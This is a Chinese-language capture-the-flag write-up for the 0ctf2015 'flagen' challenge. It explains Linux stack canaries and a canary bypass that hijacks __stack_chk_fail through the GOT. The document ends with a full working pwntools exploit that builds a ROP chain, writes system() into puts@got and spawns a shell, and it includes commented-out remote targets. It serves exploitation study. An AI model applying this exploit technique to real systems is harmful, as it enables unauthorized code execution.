本题为Linux栈溢出漏洞的利用,考查Linux Canary绕过技术及ROP(Return-Oriented-Programming)攻击负载的构造。
0x01 Linux Canary介绍
首先了解一下Linux的Canary保护机制。Canary是Linux众多安全保护机制中的一种,主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的:
![[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9pbWdzLzMvNi8wLzUvMjkvOGJiNjA3NWEyY2Q2ZDhhMmE2MzVjMDFiMWNlM2UwZWUuanBl.jpe?w=700&webp=1 "[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持")
针对此种攻击情况,如果在函数返回之前,我们能够判断ret地址是否被改写,若被改写则终止程序的执行,便可以有效地应对攻击。如何做到呢?一个很自然的想法是在刚进入函数时,在栈上放置一个标志,在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。Linux Canary保护机制便是如此,如下:
![[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9pbWdzLzgvNi8yLzQvNjcvMmJlYTQ3NjBhNDM1YzBkMTg0ZTFkNWYxZTMxYmQwYzYuanBl.jpe?w=700&webp=1 "[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持")
攻击者如果要通过栈溢出覆盖ret,则必先覆盖Canary。如果我们能判断Canary前后是否一致,便能够判断是否有攻击行为发生。
说明:上述图例仅用于说明,实际上canary并不一定是与栈上保存的BP地址相邻的。
0x02 Linux Canary实现
Linux程序的Canary保护是通过gcc编译选项来控制的,gcc与canary相关的参数及其意义分别为:
-fstack-protector:启用堆栈保护,不过只为局部变量中含有 char 数组的函数插入保护代码
-fstack-protector-all:启用堆栈保护,为所有函数插入保护代码。
-fno-stack-protector:禁用堆栈保护,为默认选项。
我们通过一个简单的例子来了解一下。示例代码如下:
#include <stdio.h>
#include <string.h>
void foo (char *src)
{
char dest[48] = {0};
strcpy (dest, src);
}
int main()
{
foo("Hello, world!");
return 0;
}
将该段代码保存为test.c,然后使用如下命令进行编译:
gcc –o test test.c
然后通过如下命令对test进行反编译:
objdump -d ./test
我们得到foo()的汇编代码如下:
1 080483eb <foo>:
2 80483eb: 55 push %ebp
3 80483ec: 89 e5 mov %esp,%ebp
4 80483ee: 57 push %edi
5 80483ef: 83 ec 34 sub $0x34,%esp
6 80483f2: 8d 55 c8 lea -0x38(%ebp),%edx
7 80483f5: b8 00 00 00 00 mov $0x0,%eax
8 80483fa: b9 0c 00 00 00 mov $0xc,%ecx
9 80483ff: 89 d7 mov %edx,%edi
10 8048401: f3 ab rep stos %eax,%es:(%edi)
11 8048403: 83 ec 08 sub $0x8,%esp
12 8048406: ff 75 08 pushl 0x8(%ebp)
13 8048409: 8d 45 c8 lea -0x38(%ebp),%eax
14 804840c: 50 push %eax
15 804840d: e8 ae fe ff ff call 80482c0 <strcpy@plt>
16 8048412: 83 c4 10 add $0x10,%esp
17 8048415: 90 nop
18 8048416: 8b 7d fc mov -0x4(%ebp),%edi
19 8048419: c9 leave
20 804841a: c3 ret
然后我们使用”-fstack-protector”编译选项重新编译编译:
gcc -o test2 -fstack-protector ./test.c
然后通过相同的命令对test2进行反编译,得到foo()的汇编代码如下:
1 0804844b <foo>:
2 804844b: 55 push %ebp
3 804844c: 89 e5 mov %esp,%ebp
4 804844e: 57 push %edi
5 804844f: 83 ec 54 sub $0x54,%esp
6 8048452: 8b 45 08 mov 0x8(%ebp),%eax
7 8048455: 89 45 b4 mov %eax,-0x4c(%ebp)
8 8048458: 65 a1 14 00 00 00 mov %gs:0x14,%eax
9 804845e: 89 45 f4 mov %eax,-0xc(%ebp)
10 8048461: 31 c0 xor %eax,%eax
11 8048463: 8d 55 c4 lea -0x3c(%ebp),%edx
12 8048466: b8 00 00 00 00 mov $0x0,%eax
13 804846b: b9 0c 00 00 00 mov $0xc,%ecx
14 8048470: 89 d7 mov %edx,%edi
15 8048472: f3 ab rep stos %eax,%es:(%edi)
16 8048474: 83 ec 08 sub $0x8,%esp
17 8048477: ff 75 b4 pushl -0x4c(%ebp)
18 804847a: 8d 45 c4 lea -0x3c(%ebp),%eax
19 804847d: 50 push %eax
20 804847e: e8 9d fe ff ff call 8048320 <strcpy@plt>
21 8048483: 83 c4 10 add $0x10,%esp
22 8048486: 90 nop
23 8048487: 8b 45 f4 mov -0xc(%ebp),%eax
24 804848a: 65 33 05 14 00 00 00 xor %gs:0x14,%eax
25 8048491: 74 05 je 8048498 <foo+0x4d>
26 8048493: e8 78 fe ff ff call 8048310 <__stack_chk_fail@plt>
27 8048498: 8b 7d fc mov -0x4(%ebp),%edi
28 804849b: c9 leave
29 804849c: c3 ret
我们用beyond compare比较两份汇编代码,可以直观的看到不同:
![[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9pbWdzLzMvNC8xLzIvMzcvMjUyNWU5NGUwZjhkNmE4MWQ2YTlhOWI1YWJiNWE1NDguanBl.jpe?w=700&webp=1 "[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持")
在右侧代码中可以看到,在函数开始时,会取gs:0x14处的值,并放在%ebp-0xc的地方(mov %gs:0x14,%eax, mov %eax,-0xc(%ebp)),在程序结束时,会将该值取出,并与gs:0x14的值进行抑或(mov -0xc(%ebp),%eax,xor %gs:0x14,%eax),如果抑或的结果为0,说明canary未被修改,程序会正常结束,反之如果抑或结果不为0,说明canary已经被非法修改,存在攻击行为,此时程序流程会走到__stack_chk_fail,从而终止程序。
0x03 Canary保护绕过方法
从Canary的工作机制,可以总结出绕过Canary保护的方法有:
- 泄露canary。由于Canary保护仅仅是检查canary是否被改写,而不会检查其他栈内容,因此如果攻击者能够泄露出canary的值,便可以在构造攻击负载时填充正确的canary,从而绕过canary检查,达到实施攻击的目的。
- 劫持__stack_chk_fail。当canary被改写时,程序执行流会走到__stack_chk_fail函数,如果攻击者可以劫持该函数,便能够改变程序的执行逻辑,执行攻击者构造的代码。我们知道,Linux采用的是延迟绑定技术(PLT),如果我们能够修改全局偏移表(GOT)中存储的__stack_chk_fail函数地址,便可以在触发canary检查失败时,跳转到指定的地址继续执行。Linux延迟绑定技术在网络上有很多介绍,请读者自行查阅,这里不做详细的说明。
我们将采用第二种方法对flagen漏洞进行利用。
0x04 漏洞利用策略
主办方提供了一个ELF程序flagen及其对应的Libc.so。在对漏洞进行利用之前,通常需要先看一下目标程序采用了哪些安全机制,以确定采取何种漏洞利用策略。
已经有大牛们为我们写好了工具,一个比较好用的脚本是checksec.sh,下载地址:https://github.com/slimm609/checksec.sh
Kali Linux上已经自带了该脚本,我们使用checksec.sh对flagen进行检查,输出结果如下:
root@gzq:/home/gzq/exploit/flagen# checksec ./flagen
[!] Pwntools does not support 32-bit Python. Use a 64-bit release.
[*] '/home/gzq/exploit/flagen/flagen'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE
我们可以看到,这是一个32位ELF程序,RELRO为” Partial RELRO”,说明我们对GOT表具有写权限,Stack为”Canary found”说明程序启用了栈保护,NX Enabled说明开启了数据执行保护(DEP),我们很难通过shellcode来执行代码了,No PIE说明未采用地址空间随机化。
综上,我们的漏洞利用策略是绕过Canary保护,并劫持Libc中的__stack_chk_fail来改变程序执行流,由于程序开启了NX,我们需要构造ROP链来执行我们的代码。
0x05 漏洞分析
用IDA对flagen进行逆向分析,这个题目的漏洞还是比较好找的,漏洞存在于Leetify()函数,该函数会对用户输入的特定字符做转换,比如将’A’和’a’转换为’4’,将’B’和’b’转换为8,同时还会将’H’和’h’转换为’1-1’,如下:
1 int __cdecl Leetify(char *dest)
2 {
3 char *v1; // eax@3
4 char *v2; // eax@4
5 char *v3; // eax@5
6 char *v4; // eax@6
7 _BYTE *v5; // ST14_4@6
8 _BYTE *v6; // eax@6
9 char *v7; // eax@7
10 char *v8; // eax@8
11 char *v9; // eax@9
12 char *v10; // eax@10
13 char *v11; // eax@11
14 char *v12; // eax@12
15 char *v13; // eax@13
16 char *p; // [sp+14h] [bp-114h]@1
17 char *i; // [sp+18h] [bp-110h]@1
18 char src; // [sp+1Ch] [bp-10Ch]@1 256 bytes
19 int v18; // [sp+11Ch] [bp-Ch]@1
20
21 v18 = *MK_FP(__GS__, 20);
22 p = &src;
23 for ( i = dest; *i; ++i )
24 {
25 switch ( *i )
26 {
27 case 0x41: // 'a' 'A' ->'4'
28 case 0x61:
29 v1 = p++;
30 *v1 = 52; // '4'
31 break;
32 case 0x42: // 'b' 'B' ->'8'
33 case 0x62:
34 v2 = p++;
35 *v2 = 56; // '8'
36 break;
37 case 0x45: // 'e' 'E' ->'3'
38 case 0x65:
39 v3 = p++;
40 *v3 = 51; // '3'
41 break;
42 case 0x48: // 'h' 'H' hXX->1-1
43 case 0x68:
44 v4 = p;
45 v5 = p + 1;
46 *v4 = 49; // '1'
47 *v5 = 45; // '-'
48 v6 = v5 + 1;
49 p = v5 + 2;
50 *v6 = 49;
51 break;
52 case 0x49: // 'i' 'I' ->'!'
53 case 0x69:
54 v7 = p++;
55 *v7 = 33; // '!'
56 break;
57 case 0x4C: // 'l' 'L' ->'1'
58 case 0x6C:
59 v8 = p++;
60 *v8 = 49; // '1'
61 break;
62 case 0x4F: // 'o' 'O'->'0'
63 case 0x6F:
64 v9 = p++;
65 *v9 = 48; // '0'
66 break;
67 case 0x53: // 's' 'S'->'5'
68 case 0x73:
69 v10 = p++;
70 *v10 = 53; // '5'
71 break;
72 case 0x54: // 't' 'T'->'7'
73 case 0x74:
74 v11 = p++;
75 *v11 = 55; // '7'
76 break;
77 case 0x5A: // 'z' 'Z'->'2'
78 case 0x7A:
79 v12 = p++;
80 *v12 = 50; // '2'
81 break;
82 default:
83 v13 = p++;
84 *v13 = *i;
85 break;
86 }
87 }
88 *p = 0;
89 strcpy(dest, &src);
90 return *MK_FP(__GS__, 20) ^ v18;
91 }
在对’H’和’h’进行转换时,负载将由1个字节变为3个字节,因此字符串长度将增加,在缓冲区未增大的情况下,将会产生溢出。因此如果攻击者构造特定的负载,在调用strcpy()时,就会造成dest缓冲区溢出。
此外还需要注意,由于程序对特定字符进行了转换,因此如果我们构造的攻击负载中含有被转换的字符,将不会达到我们的预期目的,此时需要对上述被转换字符进行适当的变换才可成功。
在执行leetify()函数时,栈结构如下:
![[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9pbWdzLzYvOC81LzAvNzQvMjM5OWNhZGY2MWUxMDJmMjA4ZWUwOGMxYjI1Mzg3MjcuanBl.jpe?w=700&webp=1 "[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持")
其中dest为指向堆缓冲区的指针,在调用leetify()时,其值将被压入栈中,由于该函数存在栈溢出漏洞,攻击者可以利用这个漏洞覆盖掉dest的值为指定地址,在后续调用strcpy()时,实现向任意地址写的目的。
我们可以将dest覆盖为__stack_chk_fail函数在got表中的地址,达到修改__stack_chk_fail函数调用地址的目的,这样后续在调用该函数时,实际上执行的是攻击者的代码。如下:
![[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9pbWdzLzcvNy84LzQvMTUvNmVjNzI1MWNhNjEzMGE5YWNkMzVjOTE5NWY2YjdjOGQuanBl.jpe?w=700&webp=1 "[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持")
0x06 漏洞利用
至此,我们的漏洞利用思路已经比较清晰了。首先,需要将dest覆盖为got表中__stack_chk_fail函数对应的表项,这样当调用strcpy(dest, src)时,实际上是将src指向的缓冲区内容拷贝到got[‘__stack_chk_fail’]中,后续在canary检查失败而触发__stack_chk_fail时,实际执行的是src指向的指令。因此我们的攻击负载应该是这样的:
fullpayload = payload + got[‘__stack_chk_fail’]
其中payload长度应该是276字节(ebp + 8 – (ebp - 268))。同时,由于程序开启了NX保护,栈上的内容无法直接执行,因此我们需要构造ROP链来执行我们的指令。
ROP Chain是由一系列的片段(Gadgets)组成的。Kali Linux上的ROPgadget工具可以帮助我们从指定的二进制文件中列出可用的ROP gadget,命令如下:
root@gzq:/home/gzq/exploit/flagen# ROPgadget --binary ./flagen > gadget.txt
在列出的gadgets中,如下两条gadgets可以实现任意地址写的目的:
0x08048d8c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048aff : add byte ptr [edi + 0x5d], bl ; ret
第一条gadget从栈中弹出edi和ebx,第二条gadget将edi+0x5d位置的内容加上bx的低字节,由于栈上的内容是我们可以控制的,因此我们可以通过上述两条gadgets实现向指定地址写入指定内容的目的。
通常flag文件是存储在文件系统中的,如果我们能够控制程序执行system(“sh”)的话,我们将会与服务器建立一个shell,从而可以执行任意命令。因此,我们需要在栈上构造如下结构并跳转到这里来执行:
![[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9pbWdzLzEvOC80LzUvNzYvN2I0ODA0ZDViNmNkYzEwM2MxYTAwMDAxMzNlNDlmNGYuanBl.jpe?w=700&webp=1 "[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持")
因此需要解决如下两个问题:
1) 计算system()的地址,并部署于栈上
2) 在内存中寻找”sh”字符串,或将该字符写入内存,并将对应的地址部署于栈上
针对第一个问题,由于程序中并未直接调用system(),因此我们无法通过读取got表来获得system()的实际地址,但是由于我们获得了libc.so,而函数的相对偏移是固定的,故我们可以通过读取got表中实际被调用的函数地址来计算system()函数的地址。
首先我们使用如下命令来查看我们可以从got表中获得哪些函数的实际地址:
root@gzq:/home/gzq/exploit/flagen# objdump -R ./flagen
./flagen: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0804affc R_386_GLOB_DAT __gmon_start__
0804b060 R_386_COPY stdin@@GLIBC_2.0
0804b080 R_386_COPY stdout@@GLIBC_2.0
0804b00c R_386_JUMP_SLOT read@GLIBC_2.0
0804b010 R_386_JUMP_SLOT puts@GLIBC_2.0
0804b014 R_386_JUMP_SLOT free@GLIBC_2.0
0804b018 R_386_JUMP_SLOT alarm@GLIBC_2.0
0804b01c R_386_JUMP_SLOT __stack_chk_fail@GLIBC_2.4
0804b020 R_386_JUMP_SLOT strcpy@GLIBC_2.0
0804b024 R_386_JUMP_SLOT malloc@GLIBC_2.0
0804b028 R_386_JUMP_SLOT printf@GLIBC_2.0
0804b02c R_386_JUMP_SLOT __gmon_start__
0804b030 R_386_JUMP_SLOT __libc_start_main@GLIBC_2.0
0804b034 R_386_JUMP_SLOT setvbuf@GLIBC_2.0
0804b038 R_386_JUMP_SLOT snprintf@GLIBC_2.0
0804b03c R_386_JUMP_SLOT atoi@GLIBC_2.0
puts()与system()的调用方式是一样的,我们选取puts()函数的实际地址来计算system()函数的地址。那么如何计算呢?我们可以根据libc.so中函数地址每个字节的偏移来计算,用puts()函数地址每字节的值加上偏移即可得到system()的地址。通过上面的两条gadgets,我们可以将system()的地址写入到got表中puts()函数对应的表项中。
这里还有一个问题就是如何跳转到这个地址来执行。通过上述输出我们看到,got表中puts函数存储的地址为0x0804b010,用如下命令将flagen反汇编:
objdump –d flagen > flagen.asm
在反汇编得到的汇编文件中,我们使用” 804b010”进行查找,发现如下代码片段:
08048510 <printf@plt>:
8048510: ff 25 10 b0 04 08 jmp *0x804b010
8048516: 68 38 00 00 00 push $0x38
804851b: e9 70 ff ff ff jmp 8048490 <read@plt-0x10>
因此,当调用printf()时,实际上会跳转到got[‘puts’]处存储的地址继续执行。
对于第二个问题,也比较好处理。运行flagen,然后查看其内存映射情况,如下:
root@gzq:/home/gzq/exploit/flagen# ps axu | grep flagen
root 3496 0.3 0.7 28392 16184 pts/1 Sl+ 15:44 0:06 /usr/bin/python2 ./flagen-pwn.py
root 3503 0.0 0.0 2200 528 pts/2 ts+ 15:44 0:00 ./flagen
root 3510 0.2 1.4 38216 30932 pts/3 Ss+ 15:44 0:04 gdb -q /home/gzq/exploit/flagen/flagen 3503 -x /tmp/pwn2fdAkU.gdb ; rm /tmp/pwn2fdAkU.gdb
root 3676 0.0 0.0 4636 856 pts/5 S+ 16:12 0:00 grep flagen
root@gzq:/home/gzq/exploit/flagen# cat /proc/3503/maps
08048000-0804a000 r-xp 00000000 08:08 1179832 /home/gzq/exploit/flagen/flagen
0804a000-0804b000 r--p 00001000 08:08 1179832 /home/gzq/exploit/flagen/flagen
0804b000-0804c000 rw-p 00002000 08:08 1179832 /home/gzq/exploit/flagen/flagen
0955e000-0957f000 rw-p 00000000 00:00 0 [heap]
b759e000-b774b000 r-xp 00000000 08:01 392330 /lib/i386-linux-gnu/libc-2.23.so
b774b000-b774d000 r--p 001ac000 08:01 392330 /lib/i386-linux-gnu/libc-2.23.so
b774d000-b774e000 rw-p 001ae000 08:01 392330 /lib/i386-linux-gnu/libc-2.23.so
b774e000-b7751000 rw-p 00000000 00:00 0
b776d000-b776f000 rw-p 00000000 00:00 0
b776f000-b7772000 r--p 00000000 00:00 0 [vvar]
b7772000-b7774000 r-xp 00000000 00:00 0 [vdso]
b7774000-b7796000 r-xp 00000000 08:01 392302 /lib/i386-linux-gnu/ld-2.23.so
b7796000-b7797000 rw-p 00000000 00:00 0
b7797000-b7798000 r--p 00022000 08:01 392302 /lib/i386-linux-gnu/ld-2.23.so
b7798000-b7799000 rw-p 00023000 08:01 392302 /lib/i386-linux-gnu/ld-2.23.so
bf8df000-bf900000 rw-p 00000000 00:00 0 [stack]
root@gzq:/home/gzq/exploit/flagen#
可以看到,在flagen的进程空间中,0804b000-0804c000区间是可写的,我们在其中选取一个地址来写入”sh;”字符串,比如地址0x804b230,这个地址处的内容应该是全零的,因为我们的gadget是通过“加”的方式写内存的。
至此,我们已经可以编写针对该漏洞的利用代码了。详细的利用代码如下,代码中含有完善的注释信息:
1 #!/usr/bin/python2
2
3 from pwn import *
4
5 #context.log_level = "debug"
6 elf = ELF("./flagen")
7
8 print "got['puts']="+hex(elf.got['puts'])
9
10 payload = ""
11 payload += p32(0x08048d89) #add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret !!src is locate at esp+0x1c, so this instruction make esp points to src
12 payload += p32(0xdeadbeef)*2
13
14 offs={"local":{"first":0x80, "second":0xB8, "third":0xFE}, "remote":{"first":0x00, "second":0xB8, "third":0xFE}, "ubuntu":{"first":0xA0, "second":0xAD, "third":0xFD}}
15 # In the libc provided, puts() is 0005F140, system() is 0003A940. Following work we do is to write system's address to puts@got
16 # In the local kali host, puts() is 0005F0D0, system() is 0003A850. Following work we do is to write system's address to puts@got
17 # In my ubuntu box, puts() is 00060380, system() is 0003B020. Following work we do is to write system's address to puts@got
18
19 #The following two gadgets we can use to write any where
20 # 0x08048d8c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
21 # 0x08048aff : add byte ptr [edi + 0x5d], bl ; ret
22 payload += p32(0x08048d8c) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
23 payload += p32(0xFFFFFF00 + offs['local']['first']) #ebx, lowest byte is 0x80, 0x80 + 0xD0 = 0x150, so we can change the first byte in puts@got to 0x50 later
24 payload += p32(0xdeadbeef) #esi, not useful here, just avoid existing '\x00'
25 payload += p32(elf.got['puts'] - 0x5d) #edi
26 payload += p32(0xdeadbeef) #ebp, same as esi
27 payload += p32(0x08048aff) #add byte ptr [edi + 0x5d], bl ; ret; !!increase the first byte to 0x40
28
29 payload += p32(0x08048d8c) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
30 payload += p32(0xFFFFFF00 + offs['local']['second']) #ebx, lowest byte is 0xB8, 0xB8 + 0xF0 = 0x1A8, so we can change the second byte in puts@got to 0xA8 later
31 payload += p32(0xdeadbeef) #esi, not useful here, just avoid existing '\x00'
32 payload += p32(elf.got['puts'] + 1 - 0x5d) #edi
33 payload += p32(0xdeadbeef) #ebp, same as esi
34 payload += p32(0x08048aff) #add byte ptr [edi + 0x5d], bl ; ret; !!increase the second byte to 0xA8
35
36 payload += p32(0x08048d8c) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
37 payload += p32(0xFFFFFF00 + + offs['local']['third']) #ebx, lowest byte is FE, 0xFE + 0x05 = 0x03, so we can change the third byte in puts@got to 0x03 later
38 payload += p32(0xdeadbeef) #esi, not useful here, just avoid existing '\x00'
39 payload += p32(elf.got['puts'] + 2 - 0x5d) #edi
40 payload += p32(0xdeadbeef) #ebp, same as esi
41 payload += p32(0x08048aff) #add byte ptr [edi + 0x5d], bl ; ret; !!increase the third byte to 0x03
42
43 #By now, we write system()'s address to puts@got successfully.
44
45 #Following we do is to write "sh;"(0x3B6873) to a location in the process memory space where default value is 0x00000000
46 jcr=0x804b230
47
48 #we can't write 's' directly because 's'(ascii=0x73) will be leetified to '5', so we use 0x01+0x72 to write it
49 payload += p32(0x08048d8c) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
50 payload += p32(0xFFFFFF01) #lowest byte 0x01(bl) is useful
51 payload += p32(0xdeadbeef) #esi, not useful here, just avoid existing '\x00'
52 payload += p32(jcr - 0x5d) #edi
53 payload += p32(0xdeadbeef) #ebp, same as esi
54 payload += p32(0x08048aff) #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
55
56 payload += p32(0x08048d8c) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
57 payload += p32(0xFFFFFF72) #lowest byte 0x72(bl) is useful
58 payload += p32(0xdeadbeef) #esi, not useful here, just avoid existing '\x00'
59 payload += p32(jcr - 0x5d) #edi
60 payload += p32(0xdeadbeef) #ebp, same as esi
61 payload += p32(0x08048aff) #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
62
63 ##Also we can't write 'h' directly because 'h'(ascii=0x68) will be leetified to '1-1', so we use 0x01+0x67 to write it
64 payload += p32(0x08048d8c) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
65 payload += p32(0xFFFFFF01) #lowest byte 0x01(bl) is useful
66 payload += p32(0xdeadbeef) #esi, not useful here, just avoid existing '\x00'
67 payload += p32(jcr + 1 - 0x5d) #edi
68 payload += p32(0xdeadbeef) #ebp, same as esi
69 payload += p32(0x08048aff) #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
70
71 payload += p32(0x08048d8c) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
72 payload += p32(0xFFFFFF67) #lowest byte 0x72(bl) is useful
73 payload += p32(0xdeadbeef) #esi, not useful here, just avoid existing '\x00'
74 payload += p32(jcr + 1 - 0x5d) #edi
75 payload += p32(0xdeadbeef) #ebp, same as esi
76 payload += p32(0x08048aff) #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
77
78 #we can write ';' directly(ascii=0x3B)
79 payload += p32(0x08048d8c) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
80 payload += p32(0xFFFFFF3B) #lowest byte 0x01(bl) is useful
81 payload += p32(0xdeadbeef) #esi, not useful here, just avoid existing '\x00'
82 payload += p32(jcr + 2 - 0x5d) #edi
83 payload += p32(0xdeadbeef) #ebp, same as esi
84 payload += p32(0x08048aff) #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
85
86 #now we can call system
87 payload += p32(elf.symbols['printf']) #call system in fact
88 payload += p32(0xdeadbeef) #faked ret address
89 payload += p32(jcr) #points to where 'sh;' is locate
90
91 print "len(payload)=%d"%(len(payload))
92
93 #padding, we need 276 bytes to hijack __stack_chk_fail.
94 hNum = (276 - len(payload))/3
95 print "hNum=%d"%(hNum)
96 payload += 'H'*hNum
97 payload += (276 - len(payload) - 2*hNum)*'A'
98 print "len(all payload)=%d"%(len(payload))
99
100 #we want to overwrite
101 payload += p32(elf.got['__stack_chk_fail'])
102
103 p = process("./flagen")
104 #p = remote("5.5.100.35", 7777)
105 #p = remote("5.5.199.3", 4444)
106
107 p.recvuntil(":")
108 p.sendline("1")
109 p.sendline(payload)
110 p.recvuntil(":")
111 #gdb.attach(p.proc.pid, "b *0x08048A58")
112 p.sendline("4")
113 p.interactive()
114 #p.close()
运行结果如下:
![[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9pbWdzLzMvNS8zLzUvNDQvMjk2MTI3Y2U0Y2Q4MjZiY2U2NmU1MGQ4MWQyZDk0NzguanBl.jpe?w=700&webp=1 "[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持")
成功建立shell,我们可以读取文件来获得flag。
注意:因为在不同的libc中函数的地址可能不同,在第一部分写system()函数地址的时候,你需要根据实际情况来进行调整, 尤其是当你构造的的负载中含有可被转换字符的时候,需要灵活变换一下,比如如果想写入0x53,因为0x53为’S’会被转换,可以先写入0x52,然后再加上0x01来间接达到写入0x53的目的。
本文章中用到的flagen可以在我的github上下载(https://github.com/gsharpsh00ter/reverse),libc.so取决于运行的环境。文章中如有不正确之处,欢迎大家指正和交流。